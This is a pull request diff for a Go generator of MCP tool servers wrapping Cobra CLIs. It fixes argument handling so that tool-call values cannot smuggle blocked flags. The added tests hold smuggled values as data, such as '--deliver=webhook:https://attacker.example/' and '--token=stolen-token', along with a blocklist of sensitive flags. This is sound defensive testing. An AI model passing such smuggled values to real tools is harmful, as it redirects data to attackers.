### PR TITLE
fix(cli): stop MCP flag smuggling and variadic argv collapse

### DIFF
--- a/internal/generator/cobratree_shellout_test.go
+++ b/internal/generator/cobratree_shellout_test.go
@@ -9,6 +9,29 @@ import (
 	"github.com/stretchr/testify/require"
 )
 
+func TestGeneratedMCPJoinsFlagValuesAndSplitsVariadicRawArgs(t *testing.T) {
+	t.Parallel()
+
+	apiSpec := minimalSpec("mcp-argv-contract")
+	outputDir := filepath.Join(t.TempDir(), "mcp-argv-contract-pp-cli")
+	require.NoError(t, New(apiSpec, outputDir).Generate())
+
+	shellout := readGenerated(t, outputDir, "internal", "mcp", "cobratree", "shellout.go")
+	assert.Contains(t, shellout, `out = append(out, "--"+k+"="+tv)`)
+	assert.Contains(t, shellout, `out = append(out, "--"+k+"="+strconv.FormatFloat(tv, 'f', -1, 64))`)
+	assert.Contains(t, shellout, `out = append(out, "--"+k+"="+strings.Join(parts, ","))`)
+	assert.Contains(t, shellout, `out = append(out, "--"+k+"="+fmt.Sprintf("%v", v))`)
+	assert.NotContains(t, shellout, `out = append(out, "--"+k, tv)`)
+	assert.NotContains(t, shellout, `out = append(out, "--"+k, strconv.FormatFloat`)
+	assert.Contains(t, shellout, `!positionals[0].Variadic`)
+
+	typemap := readGenerated(t, outputDir, "internal", "mcp", "cobratree", "typemap.go")
+	assert.Contains(t, typemap, "Variadic  bool")
+
+	requireGeneratedCompiles(t, outputDir)
+	runGoCommandRequired(t, outputDir, "test", "./internal/mcp/cobratree", "-run", "^Test(CliArgsFromMCP_ValueCannotSmuggleBlockedFlag|PositionalArgsFromRawArgsField|ShellOutVariadicRawArgsSplits|ShellOutStructuredThenRawOverflowPreservesOrder|ShellOutSinglePositionalArgsFieldPreservesWhitespace)$", "-count=1")
+}
+
 func TestGeneratedWindowsShelloutLargeOutputUsesPowerShell(t *testing.T) {
 	t.Parallel()
 

--- a/internal/generator/templates/cobratree/shellout.go.tmpl
+++ b/internal/generator/templates/cobratree/shellout.go.tmpl
@@ -151,7 +151,9 @@ func positionalArgsFromRawArgsField(raw string, positionals []positionalArg, str
 	if text == "" {
 		return nil
 	}
-	if len(positionals) == 1 && structuredCount == 0 {
+	// One descriptor is not necessarily scalar: [id...] is a single
+	// positional but still needs shell-word splitting.
+	if len(positionals) == 1 && structuredCount == 0 && !positionals[0].Variadic {
 		return []string{text}
 	}
 	return SplitShellArgs(raw)
@@ -235,16 +237,18 @@ func cliArgsFromMCP(args map[string]any, blocked map[string]bool) []string {
 	var out []string
 	for _, k := range keys {
 		v := args[k]
+		// Join values onto the flag so a value starting with -- cannot be
+		// re-parsed as its own flag (bool flags do not consume the next token).
 		switch tv := v.(type) {
 		case bool:
 			if tv {
 				out = append(out, "--"+k)
 			}
 		case float64:
-			out = append(out, "--"+k, strconv.FormatFloat(tv, 'f', -1, 64))
+			out = append(out, "--"+k+"="+strconv.FormatFloat(tv, 'f', -1, 64))
 		case string:
 			if tv != "" {
-				out = append(out, "--"+k, tv)
+				out = append(out, "--"+k+"="+tv)
 			}
 		case []any:
 			if len(tv) > 0 {
@@ -252,11 +256,11 @@ func cliArgsFromMCP(args map[string]any, blocked map[string]bool) []string {
 				for _, item := range tv {
 					parts = append(parts, fmt.Sprintf("%v", item))
 				}
-				out = append(out, "--"+k, strings.Join(parts, ","))
+				out = append(out, "--"+k+"="+strings.Join(parts, ","))
 			}
 		default:
 			if v != nil {
-				out = append(out, "--"+k, fmt.Sprintf("%v", v))
+				out = append(out, "--"+k+"="+fmt.Sprintf("%v", v))
 			}
 		}
 	}

--- a/internal/generator/templates/cobratree/shellout_test.go.tmpl
+++ b/internal/generator/templates/cobratree/shellout_test.go.tmpl
@@ -98,7 +98,7 @@ func TestCliArgsFromMCP_BlocksRootFlags(t *testing.T) {
 		"receipt-file": true,
 		"token":        true,
 	})
-	want := []string{"--limit", "10"}
+	want := []string{"--limit=10"}
 	if !reflect.DeepEqual(got, want) {
 		t.Fatalf("cliArgsFromMCP dropped/kept wrong keys: got %v, want %v", got, want)
 	}
@@ -127,9 +127,60 @@ func TestCliArgsFromMCP_AllowsPerCommandFlags(t *testing.T) {
 		"tags":    []any{"a", "b"},
 	}
 	got := cliArgsFromMCP(in, map[string]bool{"args": true})
-	want := []string{"--limit", "25", "--query", "alpha", "--tags", "a,b", "--verbose"}
+	want := []string{"--limit=25", "--query=alpha", "--tags=a,b", "--verbose"}
 	if !reflect.DeepEqual(got, want) {
 		t.Fatalf("cliArgsFromMCP per-command passthrough: got %v, want %v", got, want)
+	}
+}
+
+// TestCliArgsFromMCP_ValueCannotSmuggleBlockedFlag pins the joined
+// --key=value argv shape. A Cobra bool flag does not consume the next
+// token, so emitting `--json` and a value that starts with `--` as two
+// argv elements lets pflag parse the value as a second flag the key-only
+// blocklist never inspected.
+func TestCliArgsFromMCP_ValueCannotSmuggleBlockedFlag(t *testing.T) {
+	payload := "--deliver=webhook:https://attacker.example/"
+	blocked := map[string]bool{
+		"args":     true,
+		"base-url": true,
+		"config":   true,
+		"deliver":  true,
+		"token":    true,
+	}
+	got := cliArgsFromMCP(map[string]any{"json": payload}, blocked)
+	want := []string{"--json=" + payload}
+	if !reflect.DeepEqual(got, want) {
+		t.Fatalf("joined argv = %#v, want %#v", got, want)
+	}
+	assertNoBlockedFlagToken(t, got, blocked)
+
+	splitArgv := []string{"--json", payload}
+	if gotDeliver := smuggleProbeDeliver(t, splitArgv); gotDeliver != "webhook:https://attacker.example/" {
+		t.Fatalf("split argv did not set --deliver (got %q); joined emission is load-bearing", gotDeliver)
+	}
+
+	if err := parseSmuggleProbeFlags(t, got); err == nil {
+		t.Fatal("joined smuggled bool value parsed successfully, want ParseBool error")
+	}
+	if gotDeliver := smuggleProbeDeliver(t, got); gotDeliver != "" {
+		t.Fatalf("joined argv set --deliver to %q", gotDeliver)
+	}
+
+	stringGot := cliArgsFromMCP(map[string]any{"format": payload}, blocked)
+	if !reflect.DeepEqual(stringGot, []string{"--format=" + payload}) {
+		t.Fatalf("string flag joined argv = %#v", stringGot)
+	}
+	if gotDeliver := smuggleProbeDeliver(t, stringGot); gotDeliver != "" {
+		t.Fatalf("string flag joined argv set --deliver to %q", gotDeliver)
+	}
+
+	for _, smuggled := range []string{
+		"--base-url=https://evil.example/",
+		"--config=/tmp/evil.yaml",
+		"--token=stolen-token",
+	} {
+		argv := cliArgsFromMCP(map[string]any{"json": smuggled}, blocked)
+		assertNoBlockedFlagToken(t, argv, blocked)
 	}
 }
 
@@ -192,7 +243,7 @@ func TestBlockedStructuredArgsOnlyDropsInheritedRootFlags(t *testing.T) {
 		"json":    "true",
 		"output":  "/tmp/evil.json",
 	}, blocked)
-	want := []string{"--json", "true", "--profile", "local-profile"}
+	want := []string{"--json=true", "--profile=local-profile"}
 	if !reflect.DeepEqual(got, want) {
 		t.Fatalf("cliArgsFromMCP command-aware blocklist: got %v, want %v", got, want)
 	}
@@ -410,7 +461,7 @@ func TestCLIArgsFromMCPSkipsStructuredPositionals(t *testing.T) {
 		"id":       "123",
 		"format":   "json",
 	}, blocked)
-	want := []string{"--format", "json"}
+	want := []string{"--format=json"}
 	if !reflect.DeepEqual(got, want) {
 		t.Fatalf("cliArgsFromMCP forwarded positionals as flags: got %v, want %v", got, want)
 	}
@@ -468,6 +519,9 @@ func TestPositionalVariadicNestedAngleBracketsSanitizesKey(t *testing.T) {
 	if positionals[0].InputName != "slug" {
 		t.Fatalf("expected InputName %q, got %q", "slug", positionals[0].InputName)
 	}
+	if !positionals[0].Variadic {
+		t.Fatalf("collapsed nested variadic should be Variadic: %#v", positionals[0])
+	}
 
 	tool := mcplib.NewTool("add", toolOptionsForFlags(cmd, blockedStructuredArgsForCommand(cmd), positionals)...)
 	props := tool.InputSchema.Properties
@@ -476,6 +530,41 @@ func TestPositionalVariadicNestedAngleBracketsSanitizesKey(t *testing.T) {
 	}
 	if _, ok := props["slug>"]; ok {
 		t.Fatalf("invalid schema key %q leaked into schema: %#v", "slug>", props)
+	}
+}
+
+func TestPositionalArgsFromRawArgsField(t *testing.T) {
+	cases := []struct {
+		name string
+		use  string
+		raw  string
+		want []string
+	}{
+		{"batch variadic urls", "batch [target...]", "https://a.example https://b.example", []string{"https://a.example", "https://b.example"}},
+		{"compare event ids", "compare [event-id...]", "101 202", []string{"101", "202"}},
+		{"compare calendar ids", "compare [calendar-id...]", "first second", []string{"first", "second"}},
+		{"scalar query keeps spaces", "search <query>", "two words", []string{"two words"}},
+		{"quoted variadic target", "batch [target...]", `"hello world" other`, []string{"hello world", "other"}},
+		{"collapsed nested variadic", "add <slug> [<slug>...]", "alpha beta", []string{"alpha", "beta"}},
+	}
+	for _, tc := range cases {
+		tc := tc
+		t.Run(tc.name, func(t *testing.T) {
+			cmd := &cobra.Command{Use: tc.use}
+			positionals := positionalArgsForCommand(cmd, nil)
+			got := positionalArgsFromRawArgsField(tc.raw, positionals, 0)
+			if !reflect.DeepEqual(got, tc.want) {
+				t.Fatalf("positionalArgsFromRawArgsField(%q) = %#v, want %#v (positionals=%#v)", tc.raw, got, tc.want, positionals)
+			}
+		})
+	}
+
+	cmd := &cobra.Command{Use: "compare [event-id...]"}
+	positionals := positionalArgsForCommand(cmd, nil)
+	got := positionalArgsFromRawArgsField("202 303", positionals, 1)
+	want := []string{"202", "303"}
+	if !reflect.DeepEqual(got, want) {
+		t.Fatalf("structured-first overflow = %#v, want %#v", got, want)
 	}
 }
 
@@ -594,6 +683,128 @@ func TestShellOutSinglePositionalArgsFieldPreservesWhitespace(t *testing.T) {
 	}
 	got := decodeArgvResult(t, result)
 	want := []string{"areas", "search", "New York City"}
+	if !reflect.DeepEqual(got, want) {
+		t.Fatalf("shellout argv = %#v, want %#v", got, want)
+	}
+}
+
+func TestShellOutVariadicRawArgsSplits(t *testing.T) {
+	bin := writeArgvHelper(t)
+	cases := []struct {
+		name        string
+		use         string
+		commandPath []string
+		raw         string
+		want        []string
+	}{
+		{
+			name:        "batch targets",
+			use:         "batch [target...]",
+			commandPath: []string{"batch"},
+			raw:         "https://a.example https://b.example",
+			want:        []string{"batch", "https://a.example", "https://b.example"},
+		},
+		{
+			name:        "compare event ids",
+			use:         "compare [event-id...]",
+			commandPath: []string{"compare"},
+			raw:         "101 202",
+			want:        []string{"compare", "101", "202"},
+		},
+		{
+			name:        "compare calendar ids",
+			use:         "compare [calendar-id...]",
+			commandPath: []string{"compare"},
+			raw:         "first second",
+			want:        []string{"compare", "first", "second"},
+		},
+		{
+			name:        "quoted whitespace stays inside a target",
+			use:         "batch [target...]",
+			commandPath: []string{"batch"},
+			raw:         `"hello world" other`,
+			want:        []string{"batch", "hello world", "other"},
+		},
+	}
+	for _, tc := range cases {
+		tc := tc
+		t.Run(tc.name, func(t *testing.T) {
+			cmd := &cobra.Command{Use: tc.use}
+			positionals := positionalArgsForCommand(cmd, nil)
+			handler := shellOutToCLI(
+				func() (string, error) { return bin, nil },
+				tc.commandPath,
+				map[string]bool{"args": true},
+				map[string]bool{"args": true},
+				positionals,
+				false,
+				nil,
+			)
+			result, err := handler(context.Background(), mcplib.CallToolRequest{Params: mcplib.CallToolParams{
+				Arguments: map[string]any{"args": tc.raw},
+			}})
+			if err != nil {
+				t.Fatalf("handler returned transport error: %v", err)
+			}
+			if result.IsError {
+				t.Fatalf("handler returned tool error: %s", toolResultText(result))
+			}
+			got := decodeArgvResult(t, result)
+			if !reflect.DeepEqual(got, tc.want) {
+				t.Fatalf("shellout argv = %#v, want %#v", got, tc.want)
+			}
+		})
+	}
+
+	cmd := &cobra.Command{Use: "batch [target...]"}
+	positionals := positionalArgsForCommand(cmd, nil)
+	handler := shellOutToCLI(
+		func() (string, error) { return bin, nil },
+		[]string{"batch"},
+		map[string]bool{"args": true},
+		map[string]bool{"args": true},
+		positionals,
+		false,
+		nil,
+	)
+	result, err := handler(context.Background(), mcplib.CallToolRequest{Params: mcplib.CallToolParams{
+		Arguments: map[string]any{"args": "ok --deliver=webhook:https://evil.example/"},
+	}})
+	if err != nil {
+		t.Fatalf("handler returned transport error: %v", err)
+	}
+	if !result.IsError {
+		t.Fatalf("handler accepted flag-like raw args, result=%s", toolResultText(result))
+	}
+	if got := toolResultText(result); !strings.Contains(got, "flag-like argument") {
+		t.Fatalf("tool error = %q, want flag-like argument rejection", got)
+	}
+}
+
+func TestShellOutStructuredThenRawOverflowPreservesOrder(t *testing.T) {
+	bin := writeArgvHelper(t)
+	cmd := &cobra.Command{Use: "compare [event-id...]"}
+	positionals := positionalArgsForCommand(cmd, nil)
+	handler := shellOutToCLI(
+		func() (string, error) { return bin, nil },
+		[]string{"compare"},
+		map[string]bool{"args": true, "event-id": true},
+		map[string]bool{"args": true, "event-id": true},
+		positionals,
+		false,
+		nil,
+	)
+	result, err := handler(context.Background(), mcplib.CallToolRequest{Params: mcplib.CallToolParams{
+		Arguments: map[string]any{"event-id": "101", "args": "202 303"},
+	}})
+	if err != nil {
+		t.Fatalf("handler returned transport error: %v", err)
+	}
+	if result.IsError {
+		t.Fatalf("handler returned tool error: %s", toolResultText(result))
+	}
+	got := decodeArgvResult(t, result)
+	want := []string{"compare", "101", "202", "303"}
 	if !reflect.DeepEqual(got, want) {
 		t.Fatalf("shellout argv = %#v, want %#v", got, want)
 	}
@@ -876,6 +1087,44 @@ func writeShelloutHelper(t *testing.T, mode string) string {
 		t.Fatalf("write helper: %v", err)
 	}
 	return path
+}
+
+func newSmuggleProbeCommand() (*cobra.Command, *string) {
+	var deliver string
+	cmd := &cobra.Command{Use: "root"}
+	cmd.Flags().Bool("json", false, "")
+	cmd.Flags().String("format", "", "")
+	cmd.Flags().StringVar(&deliver, "deliver", "", "")
+	cmd.Flags().String("base-url", "", "")
+	cmd.Flags().String("config", "", "")
+	cmd.Flags().String("token", "", "")
+	return cmd, &deliver
+}
+
+func parseSmuggleProbeFlags(t *testing.T, args []string) error {
+	t.Helper()
+	cmd, _ := newSmuggleProbeCommand()
+	return cmd.ParseFlags(append([]string{}, args...))
+}
+
+func smuggleProbeDeliver(t *testing.T, args []string) string {
+	t.Helper()
+	cmd, deliver := newSmuggleProbeCommand()
+	_ = cmd.ParseFlags(append([]string{}, args...))
+	return *deliver
+}
+
+func assertNoBlockedFlagToken(t *testing.T, argv []string, blocked map[string]bool) {
+	t.Helper()
+	for _, tok := range argv {
+		name := strings.TrimPrefix(tok, "--")
+		if i := strings.IndexByte(name, '='); i >= 0 {
+			name = name[:i]
+		}
+		if blocked[name] {
+			t.Errorf("blocked flag %q leaked as argv token %q", name, tok)
+		}
+	}
 }
 
 func writeArgvHelper(t *testing.T) string {

--- a/internal/generator/templates/cobratree/typemap.go.tmpl
+++ b/internal/generator/templates/cobratree/typemap.go.tmpl
@@ -19,6 +19,7 @@ type positionalArg struct {
 	InputName string
 	Display   string
 	Required  bool
+	Variadic  bool
 }
 
 func toolOptionsForFlags(cmd *cobra.Command, blocked map[string]bool, positionals []positionalArg) []mcplib.ToolOption {
@@ -160,6 +161,7 @@ func positionalArgsForCommand(cmd *cobra.Command, blocked map[string]bool) []pos
 			continue
 		}
 		required := strings.HasPrefix(raw, "<")
+		variadic := strings.Contains(raw, "...")
 		// Strip positional decorations outright. A nested variadic like
 		// "[<slug>...]" leaves an inner ">" that end-trimming cannot reach
 		// (the "..." shields it), which would emit an invalid schema key.
@@ -176,6 +178,14 @@ func positionalArgsForCommand(cmd *cobra.Command, blocked map[string]bool) []pos
 		// Collapse repeats of the same name (e.g. "<slug> [<slug>...]") into a
 		// single positional slot; distinct-index dedup happens downstream.
 		if seenPositional[inputName] {
+			if variadic {
+				for i := range out {
+					if out[i].InputName == inputName {
+						out[i].Variadic = true
+						break
+					}
+				}
+			}
 			continue
 		}
 		seenPositional[inputName] = true
@@ -183,6 +193,7 @@ func positionalArgsForCommand(cmd *cobra.Command, blocked map[string]bool) []pos
 			InputName: inputName,
 			Display:   raw,
 			Required:  required,
+			Variadic:  variadic,
 		})
 	}
 	return out

--- a/testdata/golden/expected/generate-golden-api/printing-press-golden/internal/mcp/cobratree/shellout.go
+++ b/testdata/golden/expected/generate-golden-api/printing-press-golden/internal/mcp/cobratree/shellout.go
@@ -151,7 +151,9 @@ func positionalArgsFromRawArgsField(raw string, positionals []positionalArg, str
 	if text == "" {
 		return nil
 	}
-	if len(positionals) == 1 && structuredCount == 0 {
+	// One descriptor is not necessarily scalar: [id...] is a single
+	// positional but still needs shell-word splitting.
+	if len(positionals) == 1 && structuredCount == 0 && !positionals[0].Variadic {
 		return []string{text}
 	}
 	return SplitShellArgs(raw)
@@ -235,16 +237,18 @@ func cliArgsFromMCP(args map[string]any, blocked map[string]bool) []string {
 	var out []string
 	for _, k := range keys {
 		v := args[k]
+		// Join values onto the flag so a value starting with -- cannot be
+		// re-parsed as its own flag (bool flags do not consume the next token).
 		switch tv := v.(type) {
 		case bool:
 			if tv {
 				out = append(out, "--"+k)
 			}
 		case float64:
-			out = append(out, "--"+k, strconv.FormatFloat(tv, 'f', -1, 64))
+			out = append(out, "--"+k+"="+strconv.FormatFloat(tv, 'f', -1, 64))
 		case string:
 			if tv != "" {
-				out = append(out, "--"+k, tv)
+				out = append(out, "--"+k+"="+tv)
 			}
 		case []any:
 			if len(tv) > 0 {
@@ -252,11 +256,11 @@ func cliArgsFromMCP(args map[string]any, blocked map[string]bool) []string {
 				for _, item := range tv {
 					parts = append(parts, fmt.Sprintf("%v", item))
 				}
-				out = append(out, "--"+k, strings.Join(parts, ","))
+				out = append(out, "--"+k+"="+strings.Join(parts, ","))
 			}
 		default:
 			if v != nil {
-				out = append(out, "--"+k, fmt.Sprintf("%v", v))
+				out = append(out, "--"+k+"="+fmt.Sprintf("%v", v))
 			}
 		}
 	}

--- a/testdata/golden/expected/generate-golden-api/printing-press-golden/internal/mcp/cobratree/shellout_test.go
+++ b/testdata/golden/expected/generate-golden-api/printing-press-golden/internal/mcp/cobratree/shellout_test.go
@@ -98,7 +98,7 @@ func TestCliArgsFromMCP_BlocksRootFlags(t *testing.T) {
 		"receipt-file": true,
 		"token":        true,
 	})
-	want := []string{"--limit", "10"}
+	want := []string{"--limit=10"}
 	if !reflect.DeepEqual(got, want) {
 		t.Fatalf("cliArgsFromMCP dropped/kept wrong keys: got %v, want %v", got, want)
 	}
@@ -127,9 +127,60 @@ func TestCliArgsFromMCP_AllowsPerCommandFlags(t *testing.T) {
 		"tags":    []any{"a", "b"},
 	}
 	got := cliArgsFromMCP(in, map[string]bool{"args": true})
-	want := []string{"--limit", "25", "--query", "alpha", "--tags", "a,b", "--verbose"}
+	want := []string{"--limit=25", "--query=alpha", "--tags=a,b", "--verbose"}
 	if !reflect.DeepEqual(got, want) {
 		t.Fatalf("cliArgsFromMCP per-command passthrough: got %v, want %v", got, want)
+	}
+}
+
+// TestCliArgsFromMCP_ValueCannotSmuggleBlockedFlag pins the joined
+// --key=value argv shape. A Cobra bool flag does not consume the next
+// token, so emitting `--json` and a value that starts with `--` as two
+// argv elements lets pflag parse the value as a second flag the key-only
+// blocklist never inspected.
+func TestCliArgsFromMCP_ValueCannotSmuggleBlockedFlag(t *testing.T) {
+	payload := "--deliver=webhook:https://attacker.example/"
+	blocked := map[string]bool{
+		"args":     true,
+		"base-url": true,
+		"config":   true,
+		"deliver":  true,
+		"token":    true,
+	}
+	got := cliArgsFromMCP(map[string]any{"json": payload}, blocked)
+	want := []string{"--json=" + payload}
+	if !reflect.DeepEqual(got, want) {
+		t.Fatalf("joined argv = %#v, want %#v", got, want)
+	}
+	assertNoBlockedFlagToken(t, got, blocked)
+
+	splitArgv := []string{"--json", payload}
+	if gotDeliver := smuggleProbeDeliver(t, splitArgv); gotDeliver != "webhook:https://attacker.example/" {
+		t.Fatalf("split argv did not set --deliver (got %q); joined emission is load-bearing", gotDeliver)
+	}
+
+	if err := parseSmuggleProbeFlags(t, got); err == nil {
+		t.Fatal("joined smuggled bool value parsed successfully, want ParseBool error")
+	}
+	if gotDeliver := smuggleProbeDeliver(t, got); gotDeliver != "" {
+		t.Fatalf("joined argv set --deliver to %q", gotDeliver)
+	}
+
+	stringGot := cliArgsFromMCP(map[string]any{"format": payload}, blocked)
+	if !reflect.DeepEqual(stringGot, []string{"--format=" + payload}) {
+		t.Fatalf("string flag joined argv = %#v", stringGot)
+	}
+	if gotDeliver := smuggleProbeDeliver(t, stringGot); gotDeliver != "" {
+		t.Fatalf("string flag joined argv set --deliver to %q", gotDeliver)
+	}
+
+	for _, smuggled := range []string{
+		"--base-url=https://evil.example/",
+		"--config=/tmp/evil.yaml",
+		"--token=stolen-token",
+	} {
+		argv := cliArgsFromMCP(map[string]any{"json": smuggled}, blocked)
+		assertNoBlockedFlagToken(t, argv, blocked)
 	}
 }
 
@@ -192,7 +243,7 @@ func TestBlockedStructuredArgsOnlyDropsInheritedRootFlags(t *testing.T) {
 		"json":    "true",
 		"output":  "/tmp/evil.json",
 	}, blocked)
-	want := []string{"--json", "true", "--profile", "local-profile"}
+	want := []string{"--json=true", "--profile=local-profile"}
 	if !reflect.DeepEqual(got, want) {
 		t.Fatalf("cliArgsFromMCP command-aware blocklist: got %v, want %v", got, want)
 	}
@@ -410,7 +461,7 @@ func TestCLIArgsFromMCPSkipsStructuredPositionals(t *testing.T) {
 		"id":       "123",
 		"format":   "json",
 	}, blocked)
-	want := []string{"--format", "json"}
+	want := []string{"--format=json"}
 	if !reflect.DeepEqual(got, want) {
 		t.Fatalf("cliArgsFromMCP forwarded positionals as flags: got %v, want %v", got, want)
 	}
@@ -468,6 +519,9 @@ func TestPositionalVariadicNestedAngleBracketsSanitizesKey(t *testing.T) {
 	if positionals[0].InputName != "slug" {
 		t.Fatalf("expected InputName %q, got %q", "slug", positionals[0].InputName)
 	}
+	if !positionals[0].Variadic {
+		t.Fatalf("collapsed nested variadic should be Variadic: %#v", positionals[0])
+	}
 
 	tool := mcplib.NewTool("add", toolOptionsForFlags(cmd, blockedStructuredArgsForCommand(cmd), positionals)...)
 	props := tool.InputSchema.Properties
@@ -476,6 +530,41 @@ func TestPositionalVariadicNestedAngleBracketsSanitizesKey(t *testing.T) {
 	}
 	if _, ok := props["slug>"]; ok {
 		t.Fatalf("invalid schema key %q leaked into schema: %#v", "slug>", props)
+	}
+}
+
+func TestPositionalArgsFromRawArgsField(t *testing.T) {
+	cases := []struct {
+		name string
+		use  string
+		raw  string
+		want []string
+	}{
+		{"batch variadic urls", "batch [target...]", "https://a.example https://b.example", []string{"https://a.example", "https://b.example"}},
+		{"compare event ids", "compare [event-id...]", "101 202", []string{"101", "202"}},
+		{"compare calendar ids", "compare [calendar-id...]", "first second", []string{"first", "second"}},
+		{"scalar query keeps spaces", "search <query>", "two words", []string{"two words"}},
+		{"quoted variadic target", "batch [target...]", `"hello world" other`, []string{"hello world", "other"}},
+		{"collapsed nested variadic", "add <slug> [<slug>...]", "alpha beta", []string{"alpha", "beta"}},
+	}
+	for _, tc := range cases {
+		tc := tc
+		t.Run(tc.name, func(t *testing.T) {
+			cmd := &cobra.Command{Use: tc.use}
+			positionals := positionalArgsForCommand(cmd, nil)
+			got := positionalArgsFromRawArgsField(tc.raw, positionals, 0)
+			if !reflect.DeepEqual(got, tc.want) {
+				t.Fatalf("positionalArgsFromRawArgsField(%q) = %#v, want %#v (positionals=%#v)", tc.raw, got, tc.want, positionals)
+			}
+		})
+	}
+
+	cmd := &cobra.Command{Use: "compare [event-id...]"}
+	positionals := positionalArgsForCommand(cmd, nil)
+	got := positionalArgsFromRawArgsField("202 303", positionals, 1)
+	want := []string{"202", "303"}
+	if !reflect.DeepEqual(got, want) {
+		t.Fatalf("structured-first overflow = %#v, want %#v", got, want)
 	}
 }
 
@@ -594,6 +683,128 @@ func TestShellOutSinglePositionalArgsFieldPreservesWhitespace(t *testing.T) {
 	}
 	got := decodeArgvResult(t, result)
 	want := []string{"areas", "search", "New York City"}
+	if !reflect.DeepEqual(got, want) {
+		t.Fatalf("shellout argv = %#v, want %#v", got, want)
+	}
+}
+
+func TestShellOutVariadicRawArgsSplits(t *testing.T) {
+	bin := writeArgvHelper(t)
+	cases := []struct {
+		name        string
+		use         string
+		commandPath []string
+		raw         string
+		want        []string
+	}{
+		{
+			name:        "batch targets",
+			use:         "batch [target...]",
+			commandPath: []string{"batch"},
+			raw:         "https://a.example https://b.example",
+			want:        []string{"batch", "https://a.example", "https://b.example"},
+		},
+		{
+			name:        "compare event ids",
+			use:         "compare [event-id...]",
+			commandPath: []string{"compare"},
+			raw:         "101 202",
+			want:        []string{"compare", "101", "202"},
+		},
+		{
+			name:        "compare calendar ids",
+			use:         "compare [calendar-id...]",
+			commandPath: []string{"compare"},
+			raw:         "first second",
+			want:        []string{"compare", "first", "second"},
+		},
+		{
+			name:        "quoted whitespace stays inside a target",
+			use:         "batch [target...]",
+			commandPath: []string{"batch"},
+			raw:         `"hello world" other`,
+			want:        []string{"batch", "hello world", "other"},
+		},
+	}
+	for _, tc := range cases {
+		tc := tc
+		t.Run(tc.name, func(t *testing.T) {
+			cmd := &cobra.Command{Use: tc.use}
+			positionals := positionalArgsForCommand(cmd, nil)
+			handler := shellOutToCLI(
+				func() (string, error) { return bin, nil },
+				tc.commandPath,
+				map[string]bool{"args": true},
+				map[string]bool{"args": true},
+				positionals,
+				false,
+				nil,
+			)
+			result, err := handler(context.Background(), mcplib.CallToolRequest{Params: mcplib.CallToolParams{
+				Arguments: map[string]any{"args": tc.raw},
+			}})
+			if err != nil {
+				t.Fatalf("handler returned transport error: %v", err)
+			}
+			if result.IsError {
+				t.Fatalf("handler returned tool error: %s", toolResultText(result))
+			}
+			got := decodeArgvResult(t, result)
+			if !reflect.DeepEqual(got, tc.want) {
+				t.Fatalf("shellout argv = %#v, want %#v", got, tc.want)
+			}
+		})
+	}
+
+	cmd := &cobra.Command{Use: "batch [target...]"}
+	positionals := positionalArgsForCommand(cmd, nil)
+	handler := shellOutToCLI(
+		func() (string, error) { return bin, nil },
+		[]string{"batch"},
+		map[string]bool{"args": true},
+		map[string]bool{"args": true},
+		positionals,
+		false,
+		nil,
+	)
+	result, err := handler(context.Background(), mcplib.CallToolRequest{Params: mcplib.CallToolParams{
+		Arguments: map[string]any{"args": "ok --deliver=webhook:https://evil.example/"},
+	}})
+	if err != nil {
+		t.Fatalf("handler returned transport error: %v", err)
+	}
+	if !result.IsError {
+		t.Fatalf("handler accepted flag-like raw args, result=%s", toolResultText(result))
+	}
+	if got := toolResultText(result); !strings.Contains(got, "flag-like argument") {
+		t.Fatalf("tool error = %q, want flag-like argument rejection", got)
+	}
+}
+
+func TestShellOutStructuredThenRawOverflowPreservesOrder(t *testing.T) {
+	bin := writeArgvHelper(t)
+	cmd := &cobra.Command{Use: "compare [event-id...]"}
+	positionals := positionalArgsForCommand(cmd, nil)
+	handler := shellOutToCLI(
+		func() (string, error) { return bin, nil },
+		[]string{"compare"},
+		map[string]bool{"args": true, "event-id": true},
+		map[string]bool{"args": true, "event-id": true},
+		positionals,
+		false,
+		nil,
+	)
+	result, err := handler(context.Background(), mcplib.CallToolRequest{Params: mcplib.CallToolParams{
+		Arguments: map[string]any{"event-id": "101", "args": "202 303"},
+	}})
+	if err != nil {
+		t.Fatalf("handler returned transport error: %v", err)
+	}
+	if result.IsError {
+		t.Fatalf("handler returned tool error: %s", toolResultText(result))
+	}
+	got := decodeArgvResult(t, result)
+	want := []string{"compare", "101", "202", "303"}
 	if !reflect.DeepEqual(got, want) {
 		t.Fatalf("shellout argv = %#v, want %#v", got, want)
 	}
@@ -876,6 +1087,44 @@ func writeShelloutHelper(t *testing.T, mode string) string {
 		t.Fatalf("write helper: %v", err)
 	}
 	return path
+}
+
+func newSmuggleProbeCommand() (*cobra.Command, *string) {
+	var deliver string
+	cmd := &cobra.Command{Use: "root"}
+	cmd.Flags().Bool("json", false, "")
+	cmd.Flags().String("format", "", "")
+	cmd.Flags().StringVar(&deliver, "deliver", "", "")
+	cmd.Flags().String("base-url", "", "")
+	cmd.Flags().String("config", "", "")
+	cmd.Flags().String("token", "", "")
+	return cmd, &deliver
+}
+
+func parseSmuggleProbeFlags(t *testing.T, args []string) error {
+	t.Helper()
+	cmd, _ := newSmuggleProbeCommand()
+	return cmd.ParseFlags(append([]string{}, args...))
+}
+
+func smuggleProbeDeliver(t *testing.T, args []string) string {
+	t.Helper()
+	cmd, deliver := newSmuggleProbeCommand()
+	_ = cmd.ParseFlags(append([]string{}, args...))
+	return *deliver
+}
+
+func assertNoBlockedFlagToken(t *testing.T, argv []string, blocked map[string]bool) {
+	t.Helper()
+	for _, tok := range argv {
+		name := strings.TrimPrefix(tok, "--")
+		if i := strings.IndexByte(name, '='); i >= 0 {
+			name = name[:i]
+		}
+		if blocked[name] {
+			t.Errorf("blocked flag %q leaked as argv token %q", name, tok)
+		}
+	}
 }
 
 func writeArgvHelper(t *testing.T) string {

--- a/testdata/golden/expected/generate-golden-api/printing-press-golden/internal/mcp/cobratree/typemap.go
+++ b/testdata/golden/expected/generate-golden-api/printing-press-golden/internal/mcp/cobratree/typemap.go
@@ -19,6 +19,7 @@ type positionalArg struct {
 	InputName string
 	Display   string
 	Required  bool
+	Variadic  bool
 }
 
 func toolOptionsForFlags(cmd *cobra.Command, blocked map[string]bool, positionals []positionalArg) []mcplib.ToolOption {
@@ -160,6 +161,7 @@ func positionalArgsForCommand(cmd *cobra.Command, blocked map[string]bool) []pos
 			continue
 		}
 		required := strings.HasPrefix(raw, "<")
+		variadic := strings.Contains(raw, "...")
 		// Strip positional decorations outright. A nested variadic like
 		// "[<slug>...]" leaves an inner ">" that end-trimming cannot reach
 		// (the "..." shields it), which would emit an invalid schema key.
@@ -176,6 +178,14 @@ func positionalArgsForCommand(cmd *cobra.Command, blocked map[string]bool) []pos
